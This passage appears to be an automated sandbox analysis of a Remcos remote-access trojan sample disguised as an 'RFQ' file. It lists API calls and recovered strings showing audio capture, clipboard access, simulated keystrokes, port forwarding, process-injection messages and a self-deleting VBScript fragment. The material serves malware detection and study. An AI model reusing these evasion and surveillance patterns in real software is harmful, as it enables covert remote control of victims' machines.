                            • _free.LIBCMT ref: 00450185
                            • _free.LIBCMT ref: 004501A2
                            • _free.LIBCMT ref: 004501BA
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                            • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                            • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                            APIs
                            • __EH_prolog.LIBCMT ref: 0041913D
                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                            • Sleep.KERNEL32(000003E8), ref: 0041927D
                            • GetLocalTime.KERNEL32(?), ref: 0041928C
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                            • API String ID: 489098229-65789007
                            • Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                            • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                            • Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                            • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                            • ExitProcess.KERNEL32 ref: 0040C832
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-390638927
                            • Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                            • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                            • Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                            • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                            APIs
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                            • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                            • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                            • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                            APIs
                              • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                            • GetLastError.KERNEL32 ref: 00454AA6
                            • __dosmaperr.LIBCMT ref: 00454AAD
                            • GetFileType.KERNEL32(00000000), ref: 00454AB9
                            • GetLastError.KERNEL32 ref: 00454AC3
                            • __dosmaperr.LIBCMT ref: 00454ACC
                            • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                            • CloseHandle.KERNEL32(?), ref: 00454C36
                            • GetLastError.KERNEL32 ref: 00454C68
                            • __dosmaperr.LIBCMT ref: 00454C6F
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                            • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                            • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                            • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                            Strings
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                            • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                            • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                            • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                            • __dosmaperr.LIBCMT ref: 004393DD
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                            • __dosmaperr.LIBCMT ref: 0043941A
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                            • __dosmaperr.LIBCMT ref: 0043946E
                            • _free.LIBCMT ref: 0043947A
                            • _free.LIBCMT ref: 00439481
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 5089d0dae70482e3ce3a0db606f11b6a9dc19fb16784c614fbb9b0b6b0d96735
                            • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                            • Opcode Fuzzy Hash: 5089d0dae70482e3ce3a0db606f11b6a9dc19fb16784c614fbb9b0b6b0d96735
                            • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                            • TranslateMessage.USER32(?), ref: 00404F30
                            • DispatchMessageA.USER32(?), ref: 00404F3B
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                            • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                            • Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                            • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                            • String ID: <$@$@FG$@FG$Temp
                            • API String ID: 1107811701-2245803885
                            • Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                            • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                            • Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                            • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                            APIs
                            • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                            • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\RFQ-20241230.pif.exe), ref: 00406705
                            Strings
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                            • API String ID: 2050909247-4145329354
                            • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                            • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                            • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                            • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                            • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                            • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                            • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                            APIs
                            • _free.LIBCMT ref: 00446DEF
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00446DFB
                            • _free.LIBCMT ref: 00446E06
                            • _free.LIBCMT ref: 00446E11
                            • _free.LIBCMT ref: 00446E1C
                            • _free.LIBCMT ref: 00446E27
                            • _free.LIBCMT ref: 00446E32
                            • _free.LIBCMT ref: 00446E3D
                            • _free.LIBCMT ref: 00446E48
                            • _free.LIBCMT ref: 00446E56
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                            • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                            • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                            • API String ID: 3578746661-4192532303
                            • Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                            • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                            • Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                            • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                            Strings
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                            • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                            • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                            • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • Sleep.KERNEL32(00000064), ref: 00416688
                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                            • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                            • Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                            • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                            APIs
                            • _strftime.LIBCMT ref: 00401AD3
                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                            • API String ID: 3809562944-3643129801
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                            • waveInStart.WINMM ref: 00401A81
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: XCG$`=G$x=G
                            • API String ID: 1356121797-903574159
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                              • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                              • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                              • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                            • TranslateMessage.USER32(?), ref: 0041CA0B
                            • DispatchMessageA.USER32(?), ref: 0041CA15
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                            • __alloca_probe_16.LIBCMT ref: 00452CA1
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                            • __alloca_probe_16.LIBCMT ref: 00452D4B
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                            • __freea.LIBCMT ref: 00452DBA
                            • __freea.LIBCMT ref: 00452DC6
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 201697637-0
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • _memcmp.LIBVCRUNTIME ref: 004446B3
                            • _free.LIBCMT ref: 00444724
                            • _free.LIBCMT ref: 0044473D
                            • _free.LIBCMT ref: 0044476F
                            • _free.LIBCMT ref: 00444778
                            • _free.LIBCMT ref: 00444784
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            APIs
                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                            • _wcslen.LIBCMT ref: 0041A906
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 37874593-703403762
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                            • __alloca_probe_16.LIBCMT ref: 004499F2
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                            • __alloca_probe_16.LIBCMT ref: 00449AD7
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                            • __freea.LIBCMT ref: 00449B47
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • __freea.LIBCMT ref: 00449B50
                            • __freea.LIBCMT ref: 00449B75
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            APIs
                            • SendInput.USER32 ref: 00418B18
                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                            • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                              • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                            Similarity
                            • API ID: InputSend$Virtual
                            • String ID:
                            • API String ID: 1167301434-0
                            APIs
                            • OpenClipboard.USER32 ref: 00415A46
                            • EmptyClipboard.USER32 ref: 00415A54
                            • CloseClipboard.USER32 ref: 00415A5A
                            • OpenClipboard.USER32 ref: 00415A61
                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                            • CloseClipboard.USER32 ref: 00415A89
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID:
                            • API String ID: 2172192267-0
                            Similarity
                            • API ID: __freea$__alloca_probe_16
                            • String ID: a/p$am/pm$fD
                            • API String ID: 3509577899-1143445303
                            APIs
                            • _free.LIBCMT ref: 00447ECC
                            • _free.LIBCMT ref: 00447EF0
                            • _free.LIBCMT ref: 00448077
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                            • _free.LIBCMT ref: 00448243
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            APIs
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • _free.LIBCMT ref: 00444096
                            • _free.LIBCMT ref: 004440AD
                            • _free.LIBCMT ref: 004440CC
                            • _free.LIBCMT ref: 004440E7
                            • _free.LIBCMT ref: 004440FE
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID: Z7D
                            • API String ID: 3033488037-2145146825
                            APIs
                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                            • __fassign.LIBCMT ref: 0044A190
                            • __fassign.LIBCMT ref: 0044A1AB
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                            • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            APIs
                            • ExitThread.KERNEL32 ref: 004017F4
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • __Init_thread_footer.LIBCMT ref: 004017BC
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                            Similarity
                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: T=G$>G$>G
                            • API String ID: 1596592924-1617985637
                            APIs
                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: TUFTUF$>G$DG$DG
                            • API String ID: 3114080316-344394840
                            • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                            • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                            • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                            • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
